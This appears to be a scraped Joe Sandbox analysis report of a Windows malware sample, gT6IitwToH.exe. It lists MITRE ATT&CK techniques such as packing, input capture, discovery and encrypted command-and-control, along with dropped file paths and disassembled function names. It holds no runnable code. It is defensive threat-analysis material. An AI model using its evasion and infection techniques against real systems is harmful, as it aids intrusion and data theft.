Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gT6IitwToH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_IivJTsFD.exe_af79706180d4dcdfa5c089843f806870fc326762_c85c8746_35fe4690-f685-45ef-bab5-6b0b774389cd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5858.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BB5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BE4.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

C:\Users\user\AppData\Local\Temp\241620A7.exe

C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
gT6IitwToH.exe

Function 00414044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 004024C4 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 86
COMMON

Function 004014E0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 220
COMMON

Function 004021B8 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Function 004064D7 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 004023D4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 004010A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104
COMMON

Function 002529E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Function 00251099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Function 00251718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Function 00256076 Relevance: 11.1, APIs: 7, Instructions: 614
memoryCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre